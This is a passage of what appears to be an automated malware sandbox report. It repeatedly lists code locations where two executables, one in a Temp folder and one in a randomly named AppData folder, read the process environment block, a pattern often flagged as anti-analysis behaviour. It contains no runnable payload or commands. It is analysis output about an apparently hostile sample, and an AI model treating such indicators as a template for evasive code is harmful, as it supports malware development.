          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F35A1 mov eax, dword ptr fs:[00000030h]3_2_009F35A1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]3_2_00A8FDE2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]3_2_00A8FDE2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]3_2_00A8FDE2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]3_2_00A8FDE2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A78DF1 mov eax, dword ptr fs:[00000030h]3_2_00A78DF1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]3_2_00A46DC9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]3_2_00A46DC9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]3_2_00A46DC9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]3_2_00A46DC9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]3_2_00A46DC9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]3_2_00A46DC9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0 mov eax, dword ptr fs:[00000030h]3_2_009DD5E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0 mov eax, dword ptr fs:[00000030h]3_2_009DD5E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8E539 mov eax, dword ptr fs:[00000030h]3_2_00A8E539
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A4A537 mov eax, dword ptr fs:[00000030h]3_2_00A4A537
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98D34 mov eax, dword ptr fs:[00000030h]3_2_00A98D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]3_2_009F4D3B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]3_2_009F4D3B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]3_2_009F4D3B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]3_2_009D3D34
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAD30 mov eax, dword ptr fs:[00000030h]3_2_009CAD30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E7D50 mov eax, dword ptr fs:[00000030h]3_2_009E7D50
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A03D43 mov eax, dword ptr fs:[00000030h]3_2_00A03D43
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43540 mov eax, dword ptr fs:[00000030h]3_2_00A43540
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A73D40 mov eax, dword ptr fs:[00000030h]3_2_00A73D40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC577 mov eax, dword ptr fs:[00000030h]3_2_009EC577
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC577 mov eax, dword ptr fs:[00000030h]3_2_009EC577
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A446A7 mov eax, dword ptr fs:[00000030h]3_2_00A446A7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]3_2_00A90EA5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]3_2_00A90EA5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]3_2_00A90EA5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FE87 mov eax, dword ptr fs:[00000030h]3_2_00A5FE87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F36CC mov eax, dword ptr fs:[00000030h]3_2_009F36CC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]3_2_00A7FEC0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A08EC7 mov eax, dword ptr fs:[00000030h]3_2_00A08EC7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F16E0 mov ecx, dword ptr fs:[00000030h]3_2_009F16E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98ED6 mov eax, dword ptr fs:[00000030h]3_2_00A98ED6
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D76E2 mov eax, dword ptr fs:[00000030h]3_2_009D76E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA61C mov eax, dword ptr fs:[00000030h]3_2_009FA61C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA61C mov eax, dword ptr fs:[00000030h]3_2_009FA61C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FE3F mov eax, dword ptr fs:[00000030h]3_2_00A7FE3F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]3_2_009CC600
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]3_2_009CC600
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]3_2_009CC600
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F8E00 mov eax, dword ptr fs:[00000030h]3_2_009F8E00
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81608 mov eax, dword ptr fs:[00000030h]3_2_00A81608
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CE620 mov eax, dword ptr fs:[00000030h]3_2_009CE620
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]3_2_009D7E41
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]3_2_009D7E41
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]3_2_009D7E41
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]3_2_009D7E41
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]3_2_009D7E41
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]3_2_009D7E41
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AE44 mov eax, dword ptr fs:[00000030h]3_2_00A8AE44
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AE44 mov eax, dword ptr fs:[00000030h]3_2_00A8AE44
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]3_2_009EAE73
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]3_2_009EAE73
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]3_2_009EAE73
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]3_2_009EAE73
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]3_2_009EAE73
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D766D mov eax, dword ptr fs:[00000030h]3_2_009D766D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D8794 mov eax, dword ptr fs:[00000030h]3_2_009D8794
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]3_2_00A47794
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]3_2_00A47794
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]3_2_00A47794
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A037F5 mov eax, dword ptr fs:[00000030h]3_2_00A037F5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EF716 mov eax, dword ptr fs:[00000030h]3_2_009EF716
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA70E mov eax, dword ptr fs:[00000030h]3_2_009FA70E
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA70E mov eax, dword ptr fs:[00000030h]3_2_009FA70E
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB73D mov eax, dword ptr fs:[00000030h]3_2_009EB73D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB73D mov eax, dword ptr fs:[00000030h]3_2_009EB73D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9070D mov eax, dword ptr fs:[00000030h]3_2_00A9070D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9070D mov eax, dword ptr fs:[00000030h]3_2_00A9070D
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FE730 mov eax, dword ptr fs:[00000030h]3_2_009FE730
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C4F2E mov eax, dword ptr fs:[00000030h]3_2_009C4F2E
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C4F2E mov eax, dword ptr fs:[00000030h]3_2_009C4F2E
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FF10 mov eax, dword ptr fs:[00000030h]3_2_00A5FF10
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FF10 mov eax, dword ptr fs:[00000030h]3_2_00A5FF10
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98F6A mov eax, dword ptr fs:[00000030h]3_2_00A98F6A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DEF40 mov eax, dword ptr fs:[00000030h]3_2_009DEF40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DFF60 mov eax, dword ptr fs:[00000030h]3_2_009DFF60
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 6_2_0019F55F mov eax, dword ptr fs:[00000030h]6_2_0019F55F
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 6_2_0019F29A mov eax, dword ptr fs:[00000030h]6_2_0019F29A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A590AF mov eax, dword ptr fs:[00000030h]7_2_00A590AF
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]7_2_00A4F0BF
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov eax, dword ptr fs:[00000030h]7_2_00A4F0BF
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov eax, dword ptr fs:[00000030h]7_2_00A4F0BF
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19080 mov eax, dword ptr fs:[00000030h]7_2_00A19080
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A93884 mov eax, dword ptr fs:[00000030h]7_2_00A93884
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A93884 mov eax, dword ptr fs:[00000030h]7_2_00A93884
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]7_2_00A140E1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]7_2_00A140E1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]7_2_00A140E1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A158EC mov eax, dword ptr fs:[00000030h]7_2_00A158EC
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]7_2_00AAB8D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]7_2_00AAB8D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]7_2_00AAB8D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]7_2_00AAB8D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]7_2_00AAB8D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]7_2_00AAB8D0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]7_2_00A2B02A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]7_2_00A2B02A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]7_2_00A2B02A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]7_2_00A2B02A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]7_2_00A4002D
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]7_2_00A4002D
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]7_2_00A4002D
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]7_2_00A4002D
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]7_2_00A4002D
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]7_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]7_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]7_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]7_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE4015 mov eax, dword ptr fs:[00000030h]7_2_00AE4015
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE4015 mov eax, dword ptr fs:[00000030h]7_2_00AE4015
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]7_2_00A97016
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]7_2_00A97016
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]7_2_00A97016
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1074 mov eax, dword ptr fs:[00000030h]7_2_00AE1074
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD2073 mov eax, dword ptr fs:[00000030h]7_2_00AD2073
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A30050 mov eax, dword ptr fs:[00000030h]7_2_00A30050
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A30050 mov eax, dword ptr fs:[00000030h]7_2_00A30050
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A461A0 mov eax, dword ptr fs:[00000030h]7_2_00A461A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A461A0 mov eax, dword ptr fs:[00000030h]7_2_00A461A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]7_2_00AD49A4
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]7_2_00AD49A4
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]7_2_00AD49A4
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]7_2_00AD49A4
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A969A6 mov eax, dword ptr fs:[00000030h]7_2_00A969A6
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]7_2_00A951BE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]7_2_00A951BE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]7_2_00A951BE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]7_2_00A951BE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4A185 mov eax, dword ptr fs:[00000030h]7_2_00A4A185
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3C182 mov eax, dword ptr fs:[00000030h]7_2_00A3C182
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42990 mov eax, dword ptr fs:[00000030h]7_2_00A42990
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]7_2_00A1B1E1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]7_2_00A1B1E1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]7_2_00A1B1E1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AA41E8 mov eax, dword ptr fs:[00000030h]7_2_00AA41E8
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov ecx, dword ptr fs:[00000030h]7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4513A mov eax, dword ptr fs:[00000030h]7_2_00A4513A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4513A mov eax, dword ptr fs:[00000030h]7_2_00A4513A
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]7_2_00A19100
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]7_2_00A19100
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]7_2_00A19100
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1C962 mov eax, dword ptr fs:[00000030h]7_2_00A1C962
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B171 mov eax, dword ptr fs:[00000030h]7_2_00A1B171
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B171 mov eax, dword ptr fs:[00000030h]7_2_00A1B171
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3B944 mov eax, dword ptr fs:[00000030h]7_2_00A3B944
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3B944 mov eax, dword ptr fs:[00000030h]7_2_00A3B944
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]7_2_00A152A5
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]7_2_00A152A5
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]7_2_00A152A5
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]7_2_00A152A5
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]7_2_00A152A5
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]7_2_00A2AAB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]7_2_00A2AAB0
